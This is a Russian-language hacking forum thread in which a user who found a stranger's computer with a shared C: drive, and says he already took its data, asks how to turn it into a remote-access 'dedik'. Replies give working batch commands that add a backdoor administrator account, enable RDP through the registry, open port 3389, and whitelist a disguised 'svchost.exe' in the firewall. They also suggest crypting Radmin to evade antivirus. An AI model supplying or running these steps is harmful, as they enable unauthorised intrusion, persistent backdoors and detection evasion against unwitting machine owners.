можно ли написать такой батник чтоб запускал службу удаленный рабочий стол и открывал 3389 порт??? создовал учетку с правами админа.
учатка с правами админа и рабочим столом net user имя пароль /add net localgroup Administrators имя /add net localgroup "Remote Desktop Users" имя /add net accounts /maxpwage:unlimited
+ открываем rdp PHP: reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0 del on_rdp.bat
Пример открытия порта для rdp PHP: reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f reg add "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\GloballyOpenPorts\List" /v "3389:TCP" /t REG_SZ /d "3389:TCP:LocalSubNet:Enabled:Remote Desktop" /f
обьясню подробно ситуацию.нашел комп с рассшаренным C: все че полезно слил.но еше хочу дедик из него сделать.(pass лог не знаю от учетки,да и телнет не запушен там(соответственно запустить ни че не могу),удаленный рабочий стол тоже выключен)но просек что если кинуть файл в папку Автозагрузка то файл запускается системой.Radmin палит Hidden Administrator тоже.вот думаю батник закинуть.как думаете прокатит???
Вот еще одна тема=) PHP: netsh firewall add allowedprogram "svchost.exe" "Remote Administrator Server" ENABLE
здесь включаем в список доверяемых файлов приложение svchost.exe, его заголовок "Remote Administrator Server" это все для дефолтного виндового файрвола
Файрвол - блочит антивирус - палит тебя никто допрашивать не собирается, пока ты свою проблему популярно не обьяснишь, тебе никто не поможет... пс вначале разберись в своих мыслях, потом их выражай...
ссори...запутался немного... я же обьяснял,нашел комп,а у него диск C: расшаренный причем причем с правами админа.хочу сделать из него дедик.а на нем нету telneta и mstsc(в винде 7 телнет не установлен стандартно). radminовский сервер скидываю в папку автозагрузки а он удаляется.вот и подумал батник ему кинуть на рабочий стол или в автозагрузку.а все батники которые тут подсказали не работают чета на 7ке
попробуй криптованный радмин Я вообще хз какая там защита на семерке не пользовался=) максимум пользовался дристой, и то около месяца=) короче гугли, гугли и еще раз гугли... как говорил великий прорицатель cheater_man да кстати на ачате статей полно поройся...
пасиб...попробовал-палится...удаляется сразу((( на ачате уже много облазил но чет не нашел подходяшего...батник(который учетку добавляет и mstsc запускает на крайний случай telnet)думаю самый оптимальный вариант или прога удаленного доступа кот не палится